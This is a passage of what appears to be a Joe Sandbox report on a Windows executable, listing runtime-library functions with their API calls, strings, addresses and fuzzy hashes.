true, xrefs: 003230D8
false, xrefs: 003230B2

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID: Concurrency::cancel_current_task$std::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name$false$true
API String ID: 164343898-1062449267
Opcode ID: ce9a1cfa5a2204aead27cef4e30dc278ea646d89073979444c5ddd42d5467ddc
Instruction ID: fa4efcf35ace9c8c6043425c0b11eeb47fde1632aedfa7f3322062a090909f61
Opcode Fuzzy Hash: ce9a1cfa5a2204aead27cef4e30dc278ea646d89073979444c5ddd42d5467ddc
Instruction Fuzzy Hash: 114117359047509FC322EF65A88179BBBE4BF44700F44882DF4898F352E775EA08CBA2

Function 00327152 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00327158
GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 00327166
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00327177
GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00327188

Strings

GetTempPath2W, xrefs: 0032717D
GetSystemTimePreciseAsFileTime, xrefs: 0032716C
kernel32.dll, xrefs: 00327153
GetCurrentPackageId, xrefs: 00327160

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
API String ID: 667068680-1247241052
Opcode ID: b5625e54fe17f7f3bfef128b61003b80d77e62441a5d76bb382a1d75969d1ad2
Instruction ID: c06405c4f7a7ba114842089e05b6dc16d8529413b1638be5a5e0fb68bc0a9b0e
Opcode Fuzzy Hash: b5625e54fe17f7f3bfef128b61003b80d77e62441a5d76bb382a1d75969d1ad2
Instruction Fuzzy Hash: 28E0B679D41760BF83436F70AC5EDD63AECBB4B712B440866F401DB162DBB169008B95

Function 0032A918 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 0032AA37
___TypeMatch.LIBVCRUNTIME ref: 0032AB45
_UnwindNestedFrames.LIBCMT ref: 0032AC97
CallUnexpected.LIBVCRUNTIME ref: 0032ACB2

Strings

csm, xrefs: 0032AA6E
csm, xrefs: 0032A955
csm, xrefs: 0032A9C2

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2751267872-393685449
Opcode ID: 57a941aa10b746d2fb68de1bfc4e07261f24a296f37cb4bc41a9bc3f356d1cd9
Instruction ID: 14f92d48f4428d087172573440afc9c07863e0c5c6a0db31eef4d9d5fb47d528
Opcode Fuzzy Hash: 57a941aa10b746d2fb68de1bfc4e07261f24a296f37cb4bc41a9bc3f356d1cd9
Instruction Fuzzy Hash: A9B18D71C00A29EFCF1ADFA4E9819AEB7B5FF14310B15455AE801AF212D731DA51CF92

Function 00339C65 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 298COMMONLIBRARYCODE

Download Yara Rule

Strings

, xrefs: 00339EDE

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3907804496
Opcode ID: e57eb702b7fdc1b3c51abcd93fe38911b02c85ea2662868d212d084cc7a937dd
Instruction ID: 2f8ef330837b5f22628ad2f0fceba85a6840fcc1f29e7067150fddeca1a879b8
Opcode Fuzzy Hash: e57eb702b7fdc1b3c51abcd93fe38911b02c85ea2662868d212d084cc7a937dd
Instruction Fuzzy Hash: 5AB1F374E04249EFDB13DF98C8C0BAEBBB5AF89311F15416AE5059F292C7B09D42CB60

Function 00342504 Relevance: 12.2, APIs: 8, Instructions: 248COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?), ref: 003425AA
__alloca_probe_16.LIBCMT ref: 00342665
__alloca_probe_16.LIBCMT ref: 003426F4
__freea.LIBCMT ref: 0034273F
__freea.LIBCMT ref: 00342745
__freea.LIBCMT ref: 0034277B
__freea.LIBCMT ref: 00342781
__freea.LIBCMT ref: 00342791

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: be47f8559797b132fd5b431e1531951a57f7208bb899e4cbf09612f242f6a53c
Instruction ID: 7832c72f9d482e76898153a0f4ba587aec1ecf0f7ccc8a7c94c59f58a9f4b8a1
Opcode Fuzzy Hash: be47f8559797b132fd5b431e1531951a57f7208bb899e4cbf09612f242f6a53c
Instruction Fuzzy Hash: DA71C6729042056BDF239F549C81BAFBBE9AF45310FAA0059F944BF292DA75FC00CB64

Function 00326E28 Relevance: 12.2, APIs: 8, Instructions: 175COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00326E71
__alloca_probe_16.LIBCMT ref: 00326E9D
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00326EDC
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00326EF9
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00326F38
__alloca_probe_16.LIBCMT ref: 00326F55
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00326F97
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00326FBA

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID: ByteCharMultiStringWide$__alloca_probe_16
String ID:
API String ID: 2040435927-0
Opcode ID: f1dd32b6dbfdc0efa4db50451569ecae40ddf4c296d3f542ad693d61e756dfca
Instruction ID: 5f6a00fea98f2087eadff20973ad56e2ada101247697f1fb3f1e0f9f79b07371
Opcode Fuzzy Hash: f1dd32b6dbfdc0efa4db50451569ecae40ddf4c296d3f542ad693d61e756dfca
Instruction Fuzzy Hash: 4551D37690022ABBDF229F54FE42FAB7BB9EF40740F264024F9149A1A0E730DD10CB90

Function 003259BD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 003259C4
std::_Lockit::_Lockit.LIBCPMT ref: 003259CE

Part of subcall function 00322CF0: std::_Lockit::_Lockit.LIBCPMT ref: 00322CFF
Part of subcall function 00322CF0: std::_Lockit::~_Lockit.LIBCPMT ref: 00322D1A

codecvt.LIBCPMT ref: 00325A08
std::_Facet_Register.LIBCPMT ref: 00325A1F
std::_Lockit::~_Lockit.LIBCPMT ref: 00325A3F

Strings

`<N, xrefs: 003259D9

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
String ID: `<N
API String ID: 712880209-1426130778
Opcode ID: b68e05e9255bc440336fe91a50cc6ef8f492999997d178487296ddd62d0d6b1e
Instruction ID: 0661b87fb9592eec650ea8211c39b92b5519df6bbf01355d4f250013c01362e1
Opcode Fuzzy Hash: b68e05e9255bc440336fe91a50cc6ef8f492999997d178487296ddd62d0d6b1e
Instruction Fuzzy Hash: 1D11B4729046349FCB13EF68E8866AEB7B4AF44711F154519E801AF282DF70EF00CB91

Function 00322230 Relevance: 9.1, APIs: 6, Instructions: 95COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0032223D
std::_Lockit::_Lockit.LIBCPMT ref: 0032225B
std::_Lockit::~_Lockit.LIBCPMT ref: 0032227C
std::_Lockit::~_Lockit.LIBCPMT ref: 003222CC
std::_Facet_Register.LIBCPMT ref: 003222F6
std::_Lockit::~_Lockit.LIBCPMT ref: 0032230F

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID: std::_$Lockit$Lockit::~_$Lockit::_$Facet_Register
String ID:
API String ID: 1858714459-0
Opcode ID: 3ff2cc8fb44ea8c87a945a300f12bd4e69badea750a336ad90bd9328d8f3e721
Instruction ID: 75674b5497a4de5fc08668f1eba08f3ecd8ae5596757004f17d7d92d38ac1c02
Opcode Fuzzy Hash: 3ff2cc8fb44ea8c87a945a300f12bd4e69badea750a336ad90bd9328d8f3e721
Instruction Fuzzy Hash: 9D21F531900361AFC723EF14FC8096BB7A0FB80321F060A29F8415B252D735AE05CBD2

Function 0032A5AA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0032A5A1,00328CDA,00327E75), ref: 0032A5B8
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0032A5C6
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0032A5DF
SetLastError.KERNEL32(00000000,0032A5A1,00328CDA,00327E75), ref: 0032A631

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 80ec8db2e2e374d0cd41624bac1de327691fe7545dfae1c2e9880d0c4fd0137e
Instruction ID: fd39499bd515c2b8aad0e05643eed835bbac7520d1c882ecda6d20e454beba0d
Opcode Fuzzy Hash: 80ec8db2e2e374d0cd41624bac1de327691fe7545dfae1c2e9880d0c4fd0137e
Instruction Fuzzy Hash: C0012F3260AA316FE6732AB87DC656B6B88EF52735F310239F1108D0E3EFA10C05568D

Function 003445D0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

OffsetRect.USER32(00000000,00000000,00000000), ref: 003446F6

Strings

0, xrefs: 00344788
Zatlat, xrefs: 00344630
x<N, xrefs: 003447C9
x<N, xrefs: 0034477B

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID: OffsetRect
String ID: 0$Zatlat$x<N$x<N
API String ID: 177026234-1984873346
Opcode ID: ee0b69b435d19e39b883d8221b74b93348cf40ca258b88dd699502eb4e9acd5a
Instruction ID: 4e95e5c6ab6a42c29239856f97baaf563423bcd212851233263366609a753844
Opcode Fuzzy Hash: ee0b69b435d19e39b883d8221b74b93348cf40ca258b88dd699502eb4e9acd5a
Instruction Fuzzy Hash: CF91EF715083908FD312DF24D89976FBBE0AFC5318F140A2DF9D89B292C7B5E9448B52

Function 00331FE6 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB9BFA91,?,?,00000000,00343CC0,000000FF,?,00331F76,?,?,00331F4A,00000016), ref: 0033201B
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0033202D
FreeLibrary.KERNEL32(00000000,?,00000000,00343CC0,000000FF,?,00331F76,?,?,00331F4A,00000016), ref: 0033204F

Strings

CorExitProcess, xrefs: 00332025
mscoree.dll, xrefs: 00332014

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: d30e3558f1ebf2048e92901735f9b935854c19ec259aec6a36e922667448f552
Instruction ID: e27a0bd6de2d084c0db1f3812991429bc230ded0ff2225ab3b4b360b78d07bd5
Opcode Fuzzy Hash: d30e3558f1ebf2048e92901735f9b935854c19ec259aec6a36e922667448f552
Instruction Fuzzy Hash: B6014475D04615ABDB278F50CC49BAE7BBDFB05B11F004525E811AA2E1DBB4A904CA90

Function 00337B03 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00337B8A
__alloca_probe_16.LIBCMT ref: 00337C4B
__freea.LIBCMT ref: 00337CB2

Part of subcall function 00335136: HeapAlloc.KERNEL32(00000000,00000001,?,?,00327FC8,?,?,?,?,?,003227FE,00000001,?), ref: 00335168

__freea.LIBCMT ref: 00337CC7
__freea.LIBCMT ref: 00337CD7

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: 00487b70ac65f7e2e6c282063241671be3eb2e56d225c8a4d730480eb40f6f6b
Instruction ID: a529104d0368ac1fbcd4a1d178ac84ac256241a6ae6da78f9a0919802f878b95
Opcode Fuzzy Hash: 00487b70ac65f7e2e6c282063241671be3eb2e56d225c8a4d730480eb40f6f6b
Instruction Fuzzy Hash: 1B5191B260821AAFEF329F649DC1EBB76A9EF04750F160529BD04EB251E671CC50C7A0

Function 0032547A Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00325481
std::_Lockit::_Lockit.LIBCPMT ref: 0032548C
std::_Lockit::~_Lockit.LIBCPMT ref: 003254FA

Part of subcall function 003255DD: std::locale::_Locimp::_Locimp.LIBCPMT ref: 003255F5

std::locale::_Setgloballocale.LIBCPMT ref: 003254A7
_Yarn.LIBCPMT ref: 003254BD

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 1088826258-0
Opcode ID: a4a79a7b0c47cebb23c895f8582564c83ddd0919ccc965a46e0e946c89510794
Instruction ID: 87a065fd5371fd688ea3327478b4d791a78a32db9eb8a6eef7e977e9e5310216
Opcode Fuzzy Hash: a4a79a7b0c47cebb23c895f8582564c83ddd0919ccc965a46e0e946c89510794
Instruction Fuzzy Hash: B8017C79A05A609BCB07EF24E885A7D77A1BF85351B254018E8025F392CFB4BB42CB85

Function 0032B6F2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000011,00000000,00000800,?,0032B6A3,00000000,00000001,004E41BC,?,?,?,0032B846,00000004,InitializeCriticalSectionEx,00346EA0,InitializeCriticalSectionEx), ref: 0032B6FF
GetLastError.KERNEL32(?,0032B6A3,00000000,00000001,004E41BC,?,?,?,0032B846,00000004,InitializeCriticalSectionEx,00346EA0,InitializeCriticalSectionEx,00000000,?,0032B5FD), ref: 0032B709
LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,0032A513), ref: 0032B731

Strings

api-ms-, xrefs: 0032B716

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 5b0af3dd8e1a7e6f0c1e89f6e36269a7a470ad5d999f829c2bf30840ddaeb155
Instruction ID: e344bd47ccdb4ccb54a7c3c38a003c82608480e527ab467cdea1aeb575cf95b6
Opcode Fuzzy Hash: 5b0af3dd8e1a7e6f0c1e89f6e36269a7a470ad5d999f829c2bf30840ddaeb155
Instruction Fuzzy Hash: 58E04F39680304BBEF231F64EC46F593BA89F52B55F104020FA0DAC0E1DB61A99495D4

Function 003381B7 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(BB9BFA91,00000000,00000000,00000000), ref: 0033821A

Part of subcall function 0033A3B7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00337CA8,?,00000000,-00000008), ref: 0033A463

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00338475
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 003384BD
GetLastError.KERNEL32 ref: 00338560

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 91f13d2b28a8d9912fd41f22fbb068f31d92a8c90972767de896d4d4906f92d2
Instruction ID: d6581f8e931ae34366708e2e7af683c82fd7445764ff067660b8320983594bcc
Opcode Fuzzy Hash: 91f13d2b28a8d9912fd41f22fbb068f31d92a8c90972767de896d4d4906f92d2
Instruction Fuzzy Hash: B1D147B5D00258AFDF16CFA8D8C09ADBBB9FF49314F18452AE855EB352DB30A941CB50

Function 0032A6C1 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 0032A788
___AdjustPointer.LIBCMT ref: 0032A7AB
___AdjustPointer.LIBCMT ref: 0032A847

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: b7ee741eac4a7ed79f505e8abbdf88bb887a867e5ad4435c38b7ea31a40ff6cd
Instruction ID: d9e301bbcfb1b806f2512905fbec3f4770bb8852440203d1f3281f22a071f2e7
Opcode Fuzzy Hash: b7ee741eac4a7ed79f505e8abbdf88bb887a867e5ad4435c38b7ea31a40ff6cd
Instruction Fuzzy Hash: DA51E076601A229FDB2B9F98F841B7AB7B4FF04300F154429E9058B691E730EC81C796

Function 0033A7D3 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 0033A3B7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00337CA8,?,00000000,-00000008), ref: 0033A463

GetLastError.KERNEL32 ref: 0033A837
__dosmaperr.LIBCMT ref: 0033A83E
GetLastError.KERNEL32(?,?,?,?), ref: 0033A878
__dosmaperr.LIBCMT ref: 0033A87F

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 5a0771be799451698b1df87758d1979483bcb8af80742390d80b395bf6b6276a
Instruction ID: 9f2b318a4820844dda748a1b654ad88566caf8ad66703cf34698435d9a02e0c3
Opcode Fuzzy Hash: 5a0771be799451698b1df87758d1979483bcb8af80742390d80b395bf6b6276a
Instruction Fuzzy Hash: 65210431600A05AFCB23AF65D8C086BBBADEF10324F118528F9999F210DB30EC418792

Function 00331056 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dc8a9c489c3032e4a492dbeb30b02edc2ea19459b42f887eca37a9db14f4739
Instruction ID: d9c9c7d4fc2bd298f7b120bfa256a2ca53e976bdab3c8fd39c27ad4b62674089
Opcode Fuzzy Hash: 1dc8a9c489c3032e4a492dbeb30b02edc2ea19459b42f887eca37a9db14f4739
Instruction Fuzzy Hash: 7421C031A00215AFCB22AF75DCC19ABB7ADEF01364F114634FA189B661DB30EC8097A0

Function 0033B769 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0033B771

